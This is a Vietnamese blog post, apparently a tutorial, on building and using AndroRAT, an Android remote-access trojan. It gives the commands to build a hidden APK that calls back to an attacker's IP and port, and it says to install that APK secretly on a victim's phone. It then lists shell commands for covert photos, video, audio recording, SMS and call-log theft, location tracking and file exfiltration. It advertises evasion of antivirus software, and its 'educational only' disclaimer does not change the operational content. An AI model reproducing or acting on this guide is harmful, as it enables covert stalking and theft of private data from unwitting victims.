AndroRAT là công cụ được thiết kế để điều khiển Android từ xa và bí mật đánh cắp thông tin. Androrat là ứng dụng client/server được phát triển bằng Java Android cho phía client và server bằng Python.
AndroRAT sẽ hoạt động trên các thiết bị từ Android 4.1 (Jelly Bean) đến Android 9.0 (Oreo) (API 16 đến API 28). AndroRAT cũng hoạt động trên Android 10 (Q) nhưng một số lệnh thông dịch sẽ hoạt động không ổn định.
Phần mềm này chỉ dành cho mục đích giáo dục. Mình sẽ không chịu trách nhiệm về bất kỳ hành vi sử dụng ứng dụng cho mục đích xấu nào.
Chỉ nên sử dụng AndroRAT vào máy của mình để bí mật xem người khác làm gì với máy của bạn, đừng nên cài để theo dõi hoặc đánh cắp dữ liệu người khác, nếu không bạn sẽ chịu trách nhiệm trước pháp luật.
Các tính năng của AndroRAT
- Backdoor ẩn
- Hoàn toàn không thể bị phát hiện bởi bất kỳ phần mềm diệt virus nào.
- Ẩn biểu tượng khi cài đặt
- Apk dung lượng nhẹ và có thể chạy ẩn 24/7
- Ứng dụng tự động hoạt động khi hệ điều hành khởi động
- Có thể bí mật ghi âm, video, chụp ảnh từ cả hai camera và gửi về Server
- Bí mật xem nhật ký cuộc gọi và nhật ký SMS
- Biết vị trí hiện tại, chi tiết thẻ sim, địa chỉ ip, mac của thiết bị
Cách cài đặt AndroRAT
(Password: anonyviet.com)
AndroRAT yêu cầu Python (> 3.6) và JAVA 8 (hoặc Android Studio). Mình có đính kèm trong thư mục Download AndroRAT, bạn tìm trong thư mục Python And Java
Sau khi tải về, bạn giải nén ra, mở cmd và dùng lệnh cd trỏ đến thư mục của AndroRAT, gõ lệnh
pip install colorama
Lưu ý: Trong khi sao chép kho lưu trữ bằng Git bash trên windows, bạn có thể gặp lỗi sau:
error: unable to create file <filename>: Filename too long
Lỗi này là do Git có giới hạn 4096 ký tự cho một tệp, ngoại trừ trên Windows khi Git được biên dịch bằng msys. Nó sử dụng phiên bản cũ hơn của Windows API và có giới hạn là 260 ký tự cho tên tệp.
Bạn có thể fix lỗi này bằng cách đặt core.longpaths thành true.
git config --system core.longpaths true
Bạn phải chạy Git bash với quyền Administrator.
Cách sử dụng AndroRAT
AndroRAT có 2 chế độ:
- –build – để tạo các file apk android
- –shell – ra lệnh điều khiển thị bị bị nhiễm AndroRAT
Tạo file APK (build)
Ví dụ
Mình sẽ tạo ra RAT tên anonyviet.apk, IP Server của Hacker là 192.168.1.50 , Port: 8989, thì sẽ dùng lệnh.
python androRAT.py --build -i 192.168.1.50 -p 8989 -o anonyviet.apk
Trong trường hợp bạn muốn điều khiển máy Android ở ngoài Internet thì cần khai báo IP Public và NAT Port nhé.
OK, bây giờ tiến hành bí mật cài file .apk vừa tạo điện thoại bạn muốn theo dõi. Khi kích hoạt AndroRAT sẽ tự ẩn khỏi màn hình, tránh bị phát hiện.
Điều khiển thiết bị (Shell mode)
Trong trường hợp bạn đã tạo cài đặt thành công file apk vào điện thoại của nạn nhân, tại Server chúng ta sẽ dùng lệnh bên dưới để điều khiển và đánh cắp thông tin của điện thoại.
Usage:
python androRAT.py --shell [flags]
Flags:
-i, --ip Listner IP address
-p, --port Listner port numberSau khi chạy shell mode, bạn sẽ nhận được trình thông dịch (interpreter) của thiết bị.
Các lệnh có thể chạy trên trình thông dịch:
deviceInfo --> Hiển thị thông tin điện thoại
camList --> liệt kê camera
takepic [cameraID] --> Chụp ảnh camera
startVideo [cameraID] --> Quay video
stopVideo --> Dừng quay video và lưu file
startAudio --> Ghi âm môi trường bên ngoài
stopAudio --> Dừng ghi âm
getSMS [inbox|sent] --> xem tin nhắn SMS và tin đã gửi
getCallLogs --> xem nhật ký cuộc gọi
shell --> mở shell để nhập lệnh
vibrate [number_of_times] --> thực hiện số lần rung điện thọia
getLocation --> xem vị trí hiện tại của thiết bị
getIP --> xem IP
getSimDetails --> Xem thông tin SIM
clear --> xóa nội dung lệnh trên màn hình
getClipData --> xem nội dung clipboard
getMACAddress --> xem địa chỉ MAC Address điện thoại
exit --> thoátTrong shell còn có một số lệnh con:
get [full_file_path] --> donwloads the file to the local machine (file size upto 15mb)
put [filename] --> uploads the file to the android deviceVí dụ
Mở CMD gõ lệnh: python androRAT.py --shell -i 0.0.0.0 -p 8989
Chờ một xíu để Server kết nối với RAT, sau khi thành công bạn sẽ thấy cửa sổ đợi lệnh, tiếp tục gõ các lệnh deviceInfo để lấy thông tin thiết bị
Lệnh camlist sau đó, gõ lệnh takepic 1 để chụp hình Camera trước.
Như vậy bạn có thể điều khiển và đánh cắp dữ liệu điện thoại Android bằng AndroRAT một cách đơn giản rồi. Trong trường hợp muốn kết nối bên ngoài Internet bạn cần phải NAT Port nhé.
